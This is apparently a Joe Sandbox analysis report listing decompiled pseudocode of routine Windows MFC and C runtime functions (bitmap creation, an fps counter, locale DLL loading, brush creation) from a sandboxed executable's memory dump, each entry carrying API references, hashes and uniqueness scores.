                  				intOrPtr _t120;
                  				signed int _t121;
                  				void** _t122;
                  
                  				_t120 = __esi;
                  				_t119 = __edi;
                  				_t89 = __ebx;
                  				_t65 =  *0x44c364; // 0xa6e2bca1
                  				_v20 = _t65 ^ _t121;
                  				_v36 = __ecx;
                  				E00404730( &_v12);
                  				if(0 == 0) {
                  					_v44 = E00404750( &_v12, 0, 0x428);
                  				} else {
                  					E00427EA0(0x428);
                  					_v40 = _t122;
                  					_t116 = _v40;
                  					_v44 = _v40;
                  				}
                  				_v8 = _v44;
                  				if(_v8 != 0) {
                  					_t111 = _v8;
                  					 *_t111 = 0;
                  					 *((intOrPtr*)(_t111 + 4)) = 0;
                  					 *((intOrPtr*)(_t111 + 8)) = 0;
                  					 *((intOrPtr*)(_t111 + 0xc)) = 0;
                  					 *((intOrPtr*)(_t111 + 0x10)) = 0;
                  					 *((intOrPtr*)(_t111 + 0x14)) = 0;
                  					 *((intOrPtr*)(_t111 + 0x18)) = 0;
                  					 *((intOrPtr*)(_t111 + 0x1c)) = 0;
                  					 *((intOrPtr*)(_t111 + 0x20)) = 0;
                  					 *((intOrPtr*)(_t111 + 0x24)) = 0;
                  					_v8->bmiHeader = 0x28;
                  					_v8->bmiHeader.biWidth = _a4;
                  					_v8->bmiHeader.biHeight = _a8;
                  					_v8->bmiHeader.biPlanes = 1;
                  					_v8->bmiHeader.biBitCount = _a12;
                  					_t38 =  &_a16; // 0x402467
                  					_v8->bmiHeader.biCompression =  *_t38;
                  					__eflags = _a12 - 8;
                  					if(_a12 > 8) {
                  						__eflags = _a16 - 3;
                  						if(_a16 == 3) {
                  							__eflags =  &(_v8->bmiColors);
                  							E00402850(_t89,  &(_v8->bmiColors), 0xc, _a20, 0xc);
                  						}
                  					} else {
                  						E004281D0(_t119,  &(_v8->bmiColors), 0, 0x400);
                  					}
                  					_t116 = _v36 + 8;
                  					_v16 = CreateDIBSection(0, _v8, 0, _v36 + 8, 0, 0);
                  					__eflags = _v16;
                  					if(_v16 != 0) {
                  						__eflags = _a8;
                  						_t116 = _v16;
                  						E00402E90(_v36, _v16, (0 | _a8 >= 0x00000000) + 1);
                  						__eflags = _a24 & 0x00000001;
                  						if((_a24 & 0x00000001) != 0) {
                  							 *((char*)(_v36 + 0x1d)) = 1;
                  						}
                  						_v32 = 1;
                  						E004047C0( &_v12);
                  						_t80 = _v32;
                  					} else {
                  						_v28 = 0;
                  						E004047C0( &_v12);
                  						_t80 = _v28;
                  					}
                  				} else {
                  					_v24 = 0;
                  					E004047C0( &_v12);
                  					_t80 = _v24;
                  				}
                  				return E00427DFF(_t80, _t89, _v20 ^ _t121, _t116, _t119, _t120);
                  			}

                  APIs
                  • _memset.LIBCMT ref: 00402DD8
                  • CreateDIBSection.GDI32(00000000,00000000,00000000,?,00000000,00000000), ref: 00402E12
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CreateSection_memset
                  • String ID: g$@
                  • API String ID: 3331753385-904766593
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 64%
                  			E00404340(intOrPtr __ecx, intOrPtr* _a4) {
                  				signed int _v8;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				long _v32;
                  				signed int _t42;
                  				intOrPtr _t45;
                  				signed int _t91;
                  
                  				_push(0xffffffff);
                  				_push(E00438618);
                  				_push( *[fs:0x0]);
                  				_t42 =  *0x44c364; // 0xa6e2bca1
                  				_push(_t42 ^ _t91);
                  				 *[fs:0x0] =  &_v16;
                  				_v28 = __ecx;
                  				_t45 = _v28;
                  				if(( *(_t45 + 0xa3) & 0x000000ff) != 0) {
                  					if( *((intOrPtr*)(_v28 + 0x9c)) + 1 <= GetTickCount()) {
                  						_v32 = GetTickCount();
                  					} else {
                  						_v32 =  *((intOrPtr*)(_v28 + 0x9c)) + 1;
                  					}
                  					_v20 = _v32;
                  					E00404820( &_v24);
                  					_v8 = 0;
                  					E00406200(_v28,  &_v24, L"%d fps",  *(_v28 + 0x90) * 0x3e8 / (_v20 -  *((intOrPtr*)(_v28 + 0x9c))));
                  					 *(_v28 + 0x90) = 0;
                  					 *((char*)(_v28 + 0xa3)) = 0;
                  					 *((intOrPtr*)(_v28 + 0x9c)) = _v20;
                  					 *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0xc))))(E0040A540( &_v24));
                  					 *((intOrPtr*)( *((intOrPtr*)( *_a4))))(1);
                  					_v8 = 0xffffffff;
                  					_t45 = E00404840( &_v24);
                  				}
                  				 *[fs:0x0] = _v16;
                  				return _t45;
                  			}

                  APIs
                  • GetTickCount.KERNEL32(A6E2BCA1), ref: 00404388
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CountTick
                  • String ID: %d fps
                  • API String ID: 536389180-2152375671
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004333B3() {
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				intOrPtr _t10;
                  				void* _t12;
                  				intOrPtr _t15;
                  				intOrPtr* _t16;
                  				signed int _t19;
                  				signed int _t20;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  
                  				_t5 =  *0x451900; // 0x200
                  				_t26 = 0x14;
                  				if(_t5 != 0) {
                  					if(_t5 < _t26) {
                  						_t5 = _t26;
                  						goto L4;
                  					}
                  				} else {
                  					_t5 = 0x200;
                  					L4:
                  					 *0x451900 = _t5;
                  				}
                  				_t6 = E004313D0(_t5, 4);
                  				 *0x4508f4 = _t6;
                  				if(_t6 != 0) {
                  					L8:
                  					_t19 = 0;
                  					_t15 = 0x44cf10;
                  					while(1) {
                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                  						_t15 = _t15 + 0x20;
                  						_t19 = _t19 + 4;
                  						if(_t15 >= 0x44d190) {
                  							break;
                  						}
                  						_t6 =  *0x4508f4; // 0x5111f8
                  					}
                  					_t27 = 0xfffffffe;
                  					_t20 = 0;
                  					_t16 = 0x44cf20;
                  					do {
                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x451940 + (_t20 >> 5) * 4))));
                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                  							 *_t16 = _t27;
                  						}
                  						_t16 = _t16 + 0x20;
                  						_t20 = _t20 + 1;
                  					} while (_t16 < 0x44cf80);
                  					return 0;
                  				} else {
                  					 *0x451900 = _t26;
                  					_t6 = E004313D0(_t26, 4);
                  					 *0x4508f4 = _t6;
                  					if(_t6 != 0) {
                  						goto L8;
                  					} else {
                  						_t12 = 0x1a;
                  						return _t12;
                  					}
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: )D
                  • API String ID: 3494438863-3519450878
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0042755E(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				char _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t26;
                  				intOrPtr _t32;
                  				void* _t36;
                  				signed int _t37;
                  				void* _t40;
                  				intOrPtr _t41;
                  				signed int _t42;
                  				void* _t43;
                  
                  				_t39 = __ecx;
                  				_t43 = __ecx;
                  				_t26 = E00420870(_t36, __ecx, _t40, __ecx, __eflags);
                  				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
                  				if(_a4 != 0) {
                  					_t42 = _a8;
                  					__eflags =  *(__ecx + 0x3c) & _t42;
                  					if(__eflags == 0) {
                  						 *((intOrPtr*)(E0042083D(_t36, _t42, __ecx, __eflags) + 0x38)) = E0042754A;
                  						_t24 = _t43 + 0x3c;
                  						 *_t24 =  *(_t43 + 0x3c) | _t42;
                  						__eflags =  *_t24;
                  					}
                  				} else {
                  					_t37 = _a8;
                  					if(( *(__ecx + 0x3c) & _t37) != 0) {
                  						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
                  						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
                  							E0040CE8F(_t39, _t49, 1);
                  						}
                  						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
                  							_t9 =  &_v52; // 0x427609
                  							E004281D0(_t41, _t9, 0, 0x30);
                  							_t10 = _t43 + 0x20; // 0x69614d43
                  							_t32 =  *_t10;
                  							_v44 = _t32;
                  							_v40 = _t32;
                  							_t13 =  &_v52; // 0x427609
                  							_v52 = 0x2c;
                  							_v48 = 1;
                  							SendMessageW( *(_t41 + 0x20), 0x433, 0, _t13);
                  						}
                  						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
                  					}
                  				}
                  				return 1;
                  			}

                  APIs
                  • _memset.LIBCMT ref: 0042759F
                  • SendMessageW.USER32(00000000,00000433,00000000,vB), ref: 004275CC
                    • Part of subcall function 0040CE8F: SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0040CEB4
                    • Part of subcall function 0040CE8F: GetKeyState.USER32(00000001), ref: 0040CEC9
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset
                  • String ID: vB
                  • API String ID: 930327405-287775825
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 55%
                  			E0041D363(void* __ecx) {
                  				signed int _v8;
                  				char _v28;
                  				short _v548;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				long _t12;
                  				short _t13;
                  				intOrPtr _t19;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t30;
                  				signed int _t35;
                  
                  				_t33 = _t35;
                  				_t9 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t9 ^ _t35;
                  				_t12 = GetModuleFileNameW( *(__ecx + 0x44),  &_v548, 0x104);
                  				if(_t12 == 0) {
                  					L4:
                  					_t13 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t39 = _t12 - 0x104;
                  					if(_t12 == 0x104) {
                  						goto L4;
                  					} else {
                  						 *(PathFindExtensionW( &_v548)) = 0;
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsw");
                  						_t13 = E0041D0F2(_t19,  &_v28, L"%s%s.dll", _t39,  &_v28,  &_v548);
                  						_t26 = _t26;
                  					}
                  				}
                  				_pop(_t30);
                  				return E00427DFF(_t13, _t19, _v8 ^ _t33, _t25, _t26, _t30);
                  			}

                  APIs
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 0041D38B
                  • PathFindExtensionW.SHLWAPI(?), ref: 0041D3A1
                    • Part of subcall function 0041D0F2: __EH_prolog3_GS.LIBCMT ref: 0041D0FC
                    • Part of subcall function 0041D0F2: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,0041D3CA,?,?), ref: 0041D12C
                    • Part of subcall function 0041D0F2: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0041D140
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(?), ref: 0041D17C
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(?), ref: 0041D18A
                    • Part of subcall function 0041D0F2: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0041D1A7
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(?), ref: 0041D1D2
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041D1DB
                    • Part of subcall function 0041D0F2: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041D292
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                  • String ID: %s%s.dll
                  • API String ID: 1311856149-1649984862
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 51%
                  			E00419E1D(void* __ecx, void* __edi) {
                  				signed short _v16;
                  				signed short _v20;
                  				char _v24;
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t7;
                  				void* _t18;
                  				intOrPtr* _t19;
                  				void* _t24;
                  				signed int _t25;
                  
                  				_t7 =  *0x44be94; // 0xffffffff
                  				_t32 = _t7 - 0xffffffff;
                  				if(_t7 != 0xffffffff) {
                  					return _t7;
                  				}
                  				_push(_t18);
                  				_push(_t24);
                  				_t19 = GetProcAddress(E0040DE5A( *((intOrPtr*)( *((intOrPtr*)(E0042083D(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
                  				_t25 = 0x40000;
                  				if(_t19 != 0) {
                  					E004281D0(__edi,  &_v24, 0, 0x14);
                  					_push( &_v24);
                  					_v24 = 0x14;
                  					if( *_t19() >= 0) {
                  						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                  					}
                  				}
                  				 *0x44be94 = _t25;
                  				return _t25;
                  			}

                  APIs
                    • Part of subcall function 0040DE5A: GetModuleHandleW.KERNEL32(?,?,0040DF49,InitCommonControlsEx,00000000,?,0040E91C,00080000,00008000,?,?,00411504,?,00080000,?,?), ref: 0040DE68
                    • Part of subcall function 0040DE5A: LoadLibraryW.KERNEL32(?), ref: 0040DE78
                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00419E46
                  • _memset.LIBCMT ref: 00419E5F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc_memset
                  • String ID: DllGetVersion
                  • API String ID: 3385804498-2861820592
                  Uniqueness

                  Uniqueness Score: 5.06%

                  C-Code - Quality: 83%
                  			E00420A0C(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				short _v28;
                  				void* __esi;
                  				signed int _t7;
                  				signed int _t16;
                  				intOrPtr _t18;
                  				intOrPtr _t23;
                  				intOrPtr _t24;
                  				struct HWND__* _t25;
                  				signed int _t26;
                  
                  				_t24 = __edi;
                  				_t23 = __edx;
                  				_t18 = __ebx;
                  				_t7 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t7 ^ _t26;
                  				_t25 = _a4;
                  				if(_t25 != 0) {
                  					if((GetWindowLongW(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
                  						goto L1;
                  					} else {
                  						GetClassNameW(_t25,  &_v28, 0xa);
                  						_t16 = E0040CCD3( &_v28, L"combobox");
                  						asm("sbb eax, eax");
                  						_t11 =  ~_t16 + 1;
                  					}
                  				} else {
                  					L1:
                  					_t11 = 0;
                  				}
                  				return E00427DFF(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
                  			}

                  APIs
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00420A2D
                  • GetClassNameW.USER32(00000000,?,0000000A), ref: 00420A42
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClassLongNameWindow
                  • String ID: combobox
                  • API String ID: 1147815241-2240613097
                  • Opcode ID: 34dfe63172287794eead11c6e9921954037e172f79db84c3a66d5d6aa14a2302
                  • Instruction ID: aaf04745b86e9ae27989f5852ca24467dcb319f5cce2450581d6dffe9cb672e3
                  • Opcode Fuzzy Hash: 34dfe63172287794eead11c6e9921954037e172f79db84c3a66d5d6aa14a2302
                  • Instruction Fuzzy Hash: 3EF0F631B54228AF8B10EF64DC45DAF37E8DB26314B90012AE912E7181DA38A901879A
                  Uniqueness

                  Uniqueness Score: 0.80%

                  C-Code - Quality: 89%
                  			E0042CB7C(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                  				intOrPtr _t17;
                  				intOrPtr* _t28;
                  				void* _t29;
                  
                  				_t30 = __eflags;
                  				_t28 = __esi;
                  				_t27 = __edi;
                  				_t26 = __edx;
                  				_t19 = __ebx;
                  				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                  				E00427D4D(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                  				 *((intOrPtr*)(E0042C35A(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                  				_t17 = E0042C35A(_t19, _t26, _t27, _t30);
                  				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                  				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                  					_t17 =  *((intOrPtr*)(__esi + 0x14));
                  					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                  						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                  							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                  							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                  								_t17 = E00427D26(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                  								_t38 = _t17;
                  								if(_t17 != 0) {
                  									_push( *((intOrPtr*)(_t29 + 0x10)));
                  									_push(_t28);
                  									return E0042C914(_t38);
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _t17;
                  			}







                  APIs
                    • Part of subcall function 00427D4D: __getptd.LIBCMT ref: 00427D53
                    • Part of subcall function 00427D4D: __getptd.LIBCMT ref: 00427D63
                  • __getptd.LIBCMT ref: 0042CB8B
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042CB99
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: 14633a8505cc3882590a50a846b846ba7a8c83d7331524ba590050f22346a0c5
                  • Instruction ID: 0cbbb72dd13075209c5625144a4683ca0efb724bc596f43a706353f9bb1d7182
                  • Opcode Fuzzy Hash: 14633a8505cc3882590a50a846b846ba7a8c83d7331524ba590050f22346a0c5
                  • Instruction Fuzzy Hash: AF018F35A002258ACF349F21F8C2A6EBBB4AF14311FD4481FF44166791CB78E981CF48
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E00425AB5(void* __ecx, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t9;
                  				_Unknown_base(*)()* _t12;
                  				void* _t14;
                  				void* _t17;
                  				_Unknown_base(*)()* _t19;
                  				void* _t20;
                  
                  				_push(0);
                  				E0042922B(E004397A3, _t14, _t17, __esi);
                  				if(( *0x44fc88 & 0x00000001) == 0) {
                  					 *0x44fc88 =  *0x44fc88 | 0x00000001;
                  					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                  					_push(L"UxTheme.dll");
                  					 *0x44fc84 = E00411FDC(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
                  				}
                  				_t9 =  *0x44fc84; // 0x0
                  				_t19 =  *(_t20 + 0xc);
                  				if(_t9 != 0) {
                  					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
                  					if(_t12 != 0) {
                  						_t19 = _t12;
                  					}
                  				}
                  				return E00429303(_t19);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00425ABC
                  • GetProcAddress.KERNEL32(00000000,?,00000000,00425CC6,IsThemeBackgroundPartiallyTransparent,00425AAC,00000000,0041B7AC,?,00000006,00000000), ref: 00425AF5
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressH_prolog3Proc
                  • String ID: UxTheme.dll
                  • API String ID: 3325816569-352951104
                  • Opcode ID: 61f8b749bbf5d3e9246c73834e40f20a120313d1abaad022ef29dd071299c023
                  • Instruction ID: 7853bb496fcbb30aa1a22ccfa39d02583c65b785d20387770a5527265191a08b
                  • Opcode Fuzzy Hash: 61f8b749bbf5d3e9246c73834e40f20a120313d1abaad022ef29dd071299c023
                  • Instruction Fuzzy Hash: 8DE06D387046289BEB149F79BD8674E3B947B09755F94007AFC04D72A0CB7D9D84C61C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 89%
                  			E00414C3E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				struct HBRUSH__* _t9;
                  				intOrPtr _t19;
                  				void* _t20;
                  
                  				_push(4);
                  				E0042922B(E00438D7B, __ebx, __edi, __esi);
                  				_t19 = __ecx;
                  				 *((intOrPtr*)(_t20 - 0x10)) = __ecx;
                  				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
                  				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                  				 *((intOrPtr*)(__ecx)) = 0x43e9f8;
                  				_t9 = CreateSolidBrush( *(_t20 + 8));
                  				_t16 = __ecx;
                  				if(E00414938(__ebx, __ecx, __edi, _t9) == 0) {
                  					E0041414E(_t16);
                  				}
                  				return E00429303(_t19);
                  			}







                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414C45
                  • CreateSolidBrush.GDI32(?), ref: 00414C60
                    • Part of subcall function 0041414E: __CxxThrowException@8.LIBCMT ref: 00414164
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: BrushCreateException@8H_prolog3SolidThrow
                  • String ID: 6AA
                  • API String ID: 3804923923-924733298
                  • Opcode ID: ace8b4c388b8e683feadd32f2b01af37705470defeefcbf8ee1cee67da509f9c
                  • Instruction ID: f28505a04c46b7d3bee57340cd3067184a75c303514f2b237d264afdefa03fe1
                  • Opcode Fuzzy Hash: ace8b4c388b8e683feadd32f2b01af37705470defeefcbf8ee1cee67da509f9c
                  • Instruction Fuzzy Hash: 8DE08CB1601620ABDB21BFA5D90539E75A0AF5871AF00841EF6808E281DB7C8990879D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00414C40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				struct HBRUSH__* _t9;
                  				intOrPtr _t19;
                  				void* _t20;
                  
                  				E0042922B(E00438D7B, __ebx, __edi, __esi);
                  				_t19 = __ecx;
                  				 *((intOrPtr*)(_t20 - 0x10)) = __ecx;
                  				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
                  				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                  				 *((intOrPtr*)(__ecx)) = 0x43e9f8;
                  				_t9 = CreateSolidBrush( *(_t20 + 8));
                  				_t16 = __ecx;
                  				if(E00414938(__ebx, __ecx, __edi, _t9) == 0) {
                  					E0041414E(_t16);
                  				}
                  				return E00429303(_t19);
                  			}







                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414C45
                  • CreateSolidBrush.GDI32(?), ref: 00414C60
                    • Part of subcall function 0041414E: __CxxThrowException@8.LIBCMT ref: 00414164
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: BrushCreateException@8H_prolog3SolidThrow
                  • String ID: 6AA
                  • API String ID: 3804923923-924733298
                  • Opcode ID: 9592efd9e6a36dda905dbe8d45c820a00054e614137a69e1e340f278739cdb89
                  • Instruction ID: d17b30d93d62f7879bf83e398b08f0417c8272b7da9efe13bdfa06eefbf0116e
                  • Opcode Fuzzy Hash: 9592efd9e6a36dda905dbe8d45c820a00054e614137a69e1e340f278739cdb89
